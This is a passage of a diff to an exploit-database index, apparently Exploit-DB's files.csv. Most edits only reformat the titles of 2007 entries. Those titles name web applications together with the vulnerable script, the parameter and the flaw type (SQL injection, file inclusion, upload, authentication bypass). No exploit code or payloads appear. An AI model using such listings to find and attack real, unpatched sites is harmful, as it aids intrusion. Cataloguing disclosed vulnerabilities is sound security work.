+4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - 'Directory.php?cat_id' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 - 'search.php' SQL Injection",2007-07-14,pUm,php,webapps,0 -4187,platforms/php/webapps/4187.txt,"Traffic Stats - 'referralUrl.php offset' SQL Injection",2007-07-16,t0pP8uZz,php,webapps,0 -4189,platforms/php/webapps/4189.txt,"Expert Advisior - 'index.php id' SQL Injection",2007-07-17,t0pP8uZz,php,webapps,0 -4191,platforms/php/webapps/4191.txt,"Pictures Rating - 'index.php msgid' SQL Injection",2007-07-18,t0pP8uZz,php,webapps,0 +4187,platforms/php/webapps/4187.txt,"Traffic Stats - 'referralUrl.php?offset' SQL Injection",2007-07-16,t0pP8uZz,php,webapps,0 +4189,platforms/php/webapps/4189.txt,"Expert Advisior - 'index.php?id' SQL Injection",2007-07-17,t0pP8uZz,php,webapps,0 +4191,platforms/php/webapps/4191.txt,"Pictures Rating - 'index.php?msgid' SQL Injection",2007-07-18,t0pP8uZz,php,webapps,0 4192,platforms/php/webapps/4192.htm,"Vivvo CMS 3.4 - 'index.php' Blind SQL Injection",2007-07-18,ajann,php,webapps,0 4193,platforms/php/webapps/4193.txt,"QuickEStore 8.2 - 'insertorder.cfm' SQL Injection",2007-07-18,meoconx,php,webapps,0 4194,platforms/php/webapps/4194.txt,"Joomla! Component Expose RC35 - Arbitrary File Upload",2007-07-18,"Cold Zero",php,webapps,0 -4195,platforms/php/webapps/4195.txt,"BBS E-Market - 'postscript.php p_mode' Remote File Inclusion",2007-07-18,mozi,php,webapps,0 +4195,platforms/php/webapps/4195.txt,"BBS E-Market - 'postscript.php?p_mode' Remote File Inclusion",2007-07-18,mozi,php,webapps,0 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - 'link_main.php' Remote File Inclusion",2007-07-18,bd0rk,php,webapps,0 4198,platforms/asp/webapps/4198.txt,"A-shop 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 -4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - (Topics topicid) SQL Injection",2007-07-18,anonymous,php,webapps,0 +4199,platforms/php/webapps/4199.txt,"Md-Pro 1.0.8x - Topics topicid SQL Injection",2007-07-18,anonymous,php,webapps,0 4201,platforms/php/webapps/4201.txt,"Joomla! Component Pony Gallery 1.5 - SQL Injection",2007-07-19,ajann,php,webapps,0 -4206,platforms/php/webapps/4206.txt,"Blog System 1.x - 'index.php news_id' SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 +4206,platforms/php/webapps/4206.txt,"Blog System 1.x - 'index.php?news_id' SQL Injection",2007-07-20,t0pP8uZz,php,webapps,0 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition - 'catid' SQL Injection",2007-07-21,t0pP8uZz,php,webapps,0 -4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 +4210,platforms/php/webapps/4210.txt,"RGameScript Pro - 'page.php?id' Remote File Inclusion",2007-07-21,Warpboy,php,webapps,0 4211,platforms/php/webapps/4211.htm,"JBlog 1.0 - Create / Delete Admin Authentication Bypass",2007-07-21,s4mi,php,webapps,0 4212,platforms/php/webapps/4212.txt,"Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution",2007-07-22,"Johannes Greil",php,webapps,0 -4213,platforms/php/webapps/4213.txt,"bwired - 'index.php newsID' SQL Injection",2007-07-22,g00ns,php,webapps,0 +4213,platforms/php/webapps/4213.txt,"bwired - 'index.php?newsID' SQL Injection",2007-07-22,g00ns,php,webapps,0 4219,platforms/php/webapps/4219.txt,"Confixx Pro 3.3.1 - 'saveserver.php' Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 4220,platforms/php/webapps/4220.pl,"Entertainment CMS - Local File Inclusion / Remote Command Execution",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0 @@ -18603,18 +18604,18 @@ id,file,description,date,author,platform,type,port 4235,platforms/php/webapps/4235.txt,"Seditio CMS 121 - 'pfs.php' Arbitrary File Upload",2007-07-27,A.D.T,php,webapps,0 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - 'comments_get.asp id' SQL Injection",2007-07-28,g00ns,asp,webapps,0 -4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 +4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php?cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,php,webapps,0 4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 -4248,platforms/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 -4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - 'main.php cid' SQL Injection",2007-08-02,uimp,php,webapps,0 +4248,platforms/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - 'mapId' SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 +4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - 'main.php?cid' SQL Injection",2007-08-02,uimp,php,webapps,0 4254,platforms/php/webapps/4254.txt,"AuraCMS Forum Module - SQL Injection",2007-08-05,k1tk4t,php,webapps,0 -4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 +4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - 'topic' SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 -4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 -4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 +4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php?cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 +4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - 'svr_rootscript' Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - 'fc_example.php' Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 @@ -18622,34 +18623,34 @@ id,file,description,date,author,platform,type,port 4275,platforms/php/webapps/4275.php,"PHP Blue Dragon CMS 3.0.0 - SQL Injection",2007-08-10,Kacper,php,webapps,0 4276,platforms/php/webapps/4276.txt,"PHP blue dragon CMS 3.0.0 - Remote File Inclusion",2007-08-10,Kacper,php,webapps,0 4277,platforms/php/webapps/4277.php,"PHP Blue Dragon CMS 3.0.0 - Remote Code Execution",2007-08-10,Kacper,php,webapps,0 -4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - 'pixlie.php root' Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 -4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - (file) Remote File Disclosure",2007-08-13,dun,php,webapps,0 -4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 +4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - 'pixlie.php?root' Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 +4282,platforms/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure",2007-08-13,dun,php,webapps,0 +4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php?cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass (SQL Injection)",2007-08-14,s4squatch,cgi,webapps,0 -4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 +4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php?query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 -4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 +4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - 'category_id' SQL Injection",2007-08-21,k1tk4t,php,webapps,0 4305,platforms/php/webapps/4305.txt,"Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,php,webapps,0 -4306,platforms/php/webapps/4306.txt,"Mambo Component Remository - (cat) SQL Injection",2007-08-23,ajann,php,webapps,0 -4307,platforms/php/webapps/4307.txt,"Joomla! Component RSfiles 1.0.2 - (path) File Download",2007-08-23,ajann,php,webapps,0 -4308,platforms/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0 -4309,platforms/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0 +4306,platforms/php/webapps/4306.txt,"Mambo Component Remository - 'cat' SQL Injection",2007-08-23,ajann,php,webapps,0 +4307,platforms/php/webapps/4307.txt,"Joomla! Component RSfiles 1.0.2 - 'path' File Download",2007-08-23,ajann,php,webapps,0 +4308,platforms/php/webapps/4308.txt,"Joomla! Component Nice Talk 0.9.3 - 'tagid' SQL Injection",2007-08-23,ajann,php,webapps,0 +4309,platforms/php/webapps/4309.txt,"Joomla! Component EventList 0.8 - 'did' SQL Injection",2007-08-23,ajann,php,webapps,0 4310,platforms/php/webapps/4310.txt,"Joomla! Component BibTeX 1.3 - Blind SQL Injection",2007-08-23,ajann,php,webapps,0 4313,platforms/php/webapps/4313.pl,"SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 -4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - 'include.php skindir' Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 +4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - 'include.php?skindir' Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - SQL Injection / Remote File Inclusion",2007-08-27,SmOk3,php,webapps,0 4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - 'show' SQL Injection",2007-08-27,D4m14n,php,webapps,0 4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 - 'revert-content.php' SQL Injection",2007-08-28,"not sec group",php,webapps,0 4330,platforms/php/webapps/4330.txt,"ACG News 1.0 - 'aid'/'catid' SQL Injection",2007-08-28,SmOk3,php,webapps,0 -4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - 'viewitem.php ItemID' Blind SQL Injection",2007-08-28,irvian,php,webapps,0 +4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - 'viewitem.php?ItemID' Blind SQL Injection",2007-08-28,irvian,php,webapps,0 4332,platforms/php/webapps/4332.txt,"VWar 1.5.0 R15 - 'mvcw.php' Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan 4.2.0 - 'mvcw_conver.php' Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 - 'xGB.php' Remote Security Bypass",2007-08-29,DarkFuneral,php,webapps,0 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,php,webapps,0 -4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - 'shownews.php id' SQL Injection",2007-08-29,SmOk3,php,webapps,0 -4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 - (rootdir) Remote File Inclusion",2007-08-29,GoLd_M,php,webapps,0 +4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - 'shownews.php?id' SQL Injection",2007-08-29,SmOk3,php,webapps,0 +4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 - 'rootdir' Remote File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - 'uploadmedia.cgi' Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0 @@ -18657,25 +18658,25 @@ id,file,description,date,author,platform,type,port 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet - 'files_dir' Multiple Remote File Inclusions",2007-09-02,bius,php,webapps,0 -4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php ID' SQL Injection",2007-09-02,k1tk4t,php,webapps,0 +4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php?ID' SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - 'DB_adodb.class.php' Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - 'Environment.php' Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 4368,platforms/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0 4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - 'start.php' SQL Injection",2007-09-07,k1tk4t,php,webapps,0 -4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - 'index.php dlid' SQL Injection",2007-09-07,k1tk4t,php,webapps,0 +4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - 'index.php?dlid' SQL Injection",2007-09-07,k1tk4t,php,webapps,0 4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,php,webapps,0 4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple SQL Injections",2007-09-08,k1tk4t,php,webapps,0 4377,platforms/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",php,webapps,0 4378,platforms/php/webapps/4378.htm,"Fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - 'blanko.preview.php' Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusions",2007-09-08,"Nice Name Crew",php,webapps,0 -4382,platforms/php/webapps/4382.txt,"PHPress 0.2.0 - 'adisplay.php lang' Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 +4382,platforms/php/webapps/4382.txt,"PHPress 0.2.0 - 'adisplay.php?lang' Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 4383,platforms/php/webapps/4383.txt,"Joomla! Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",php,webapps,0 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusions",2007-09-08,MhZ91,php,webapps,0 4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps,0 -4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php f' Arbitrary File Download",2007-09-10,k-one,php,webapps,0 +4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php?f' Arbitrary File Download",2007-09-10,k-one,php,webapps,0 4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 - 'MGR' Multiple Remote File Inclusions",2007-09-10,QTRinux,php,webapps,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 @@ -18684,18 +18685,18 @@ id,file,description,date,author,platform,type,port 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 -4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php approot' Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 +4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php?approot' Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps,0 -4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - (id_actividad) SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0 -4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - 'index.php id' SQL Injection",2007-09-14,s4mi,php,webapps,0 -4410,platforms/php/webapps/4410.php,"Gelato - 'index.php post' SQL Injection",2007-09-14,s0cratex,php,webapps,0 +4407,platforms/php/webapps/4407.java,"PHP Webquest 2.5 - 'id_actividad' SQL Injection",2007-09-14,D4real_TeaM,php,webapps,0 +4408,platforms/php/webapps/4408.pl,"JBlog 1.0 - 'index.php?id' SQL Injection",2007-09-14,s4mi,php,webapps,0 +4410,platforms/php/webapps/4410.php,"Gelato - 'index.php?post' SQL Injection",2007-09-14,s0cratex,php,webapps,0 4411,platforms/php/webapps/4411.txt,"Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure",2007-09-15,GoLd_M,php,webapps,0 4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - 'login.php' SQL Injection",2007-09-15,s4mi,php,webapps,0 4413,platforms/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module - SQL Injection",2007-09-15,s4mi,php,webapps,0 4414,platforms/php/webapps/4414.pl,"KwsPHP 1.0 stats Module - SQL Injection",2007-09-15,s4mi,php,webapps,0 4415,platforms/php/webapps/4415.txt,"Joomla! Component flash fun! 1.0 - Remote File Inclusion",2007-09-15,Morgan,php,webapps,0 4416,platforms/php/webapps/4416.txt,"Joomla! Component joom12pic 1.0 - Remote File Inclusion",2007-09-16,Morgan,php,webapps,0 -4417,platforms/php/webapps/4417.txt,"SimpCMS - (keyword) SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 +4417,platforms/php/webapps/4417.txt,"SimpCMS - 'keyword' SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 4418,platforms/php/webapps/4418.sh,"Omnistar Article Manager Software - 'article.php' SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 4419,platforms/php/webapps/4419.php,"Shop-Script FREE 2.0 - Remote Command Execution",2007-09-17,InATeam,php,webapps,0 4421,platforms/php/webapps/4421.txt,"phpsyncml 0.1.2 - Remote File Inclusion",2007-09-18,S.W.A.T.,php,webapps,0 @@ -18707,26 +18708,26 @@ id,file,description,date,author,platform,type,port 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0 -4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - 'index.php q' Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 +4439,platforms/php/webapps/4439.txt,"neuron news 1.0 - 'index.php?q' Local File Inclusion",2007-09-21,Dj7xpl,php,webapps,0 4440,platforms/php/webapps/4440.txt,"Joomla! Component com_slideshow - Remote File Inclusion",2007-09-21,ShockShadow,php,webapps,0 4441,platforms/php/webapps/4441.txt,"iziContents rc6 - Local/Remote File Inclusion",2007-09-21,irk4z,php,webapps,0 4442,platforms/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps,0 4443,platforms/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps,0 -4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 -4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php _path' Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 +4444,platforms/php/webapps/4444.txt,"Black Lily 2007 - 'products.php?class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps,0 +4446,platforms/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion",2007-09-23,ShockShadow,php,webapps,0 4447,platforms/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",php,webapps,0 4448,platforms/php/webapps/4448.txt,"helplink 0.1.0 - 'show.php' Remote File Inclusion",2007-09-23,GoLd_M,php,webapps,0 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,php,webapps,0 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusions",2007-09-24,BiNgZa,php,webapps,0 -4454,platforms/php/webapps/4454.txt,"sk.log 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 +4454,platforms/php/webapps/4454.txt,"sk.log 0.5.3 - 'skin_url' Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps,0 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - 'notas.asp nota_id' SQL Injection",2007-09-26,ka0x,asp,webapps,0 4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 -4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - 'forum.php view' Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 -4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 +4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - 'forum.php?view' Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 +4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - 'repertoire' Remote File Inclusion",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 -4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 +4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - 'SRC_PATH' Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0 4467,platforms/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0 @@ -18739,7 +18740,7 @@ id,file,description,date,author,platform,type,port 4476,platforms/php/webapps/4476.txt,"Segue CMS 1.8.4 - 'index.php' Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 4477,platforms/php/webapps/4477.txt,"PHP wcms XT 0.0.7 - Multiple Remote File Inclusions",2007-10-01,kezzap66345,php,webapps,0 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,php,webapps,0 -4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 +4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,php,webapps,0 4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 - SQL Injection",2007-10-04,bius,php,webapps,0 4483,platforms/php/webapps/4483.txt,"Ossigeno CMS 2.2a3 - 'footer.php' Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps,0 4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps,0 @@ -18747,7 +18748,7 @@ id,file,description,date,author,platform,type,port 4489,platforms/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps,0 4490,platforms/php/webapps/4490.txt,"Else If CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps,0 4491,platforms/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps,0 -4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 +4492,platforms/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php?path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps,0 4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps,0 4495,platforms/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps,0 @@ -18756,7 +18757,7 @@ id,file,description,date,author,platform,type,port 4499,platforms/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps,0 4500,platforms/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 - 'galerie.php' SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps,0 -4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 +4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps,0 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps,0 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL 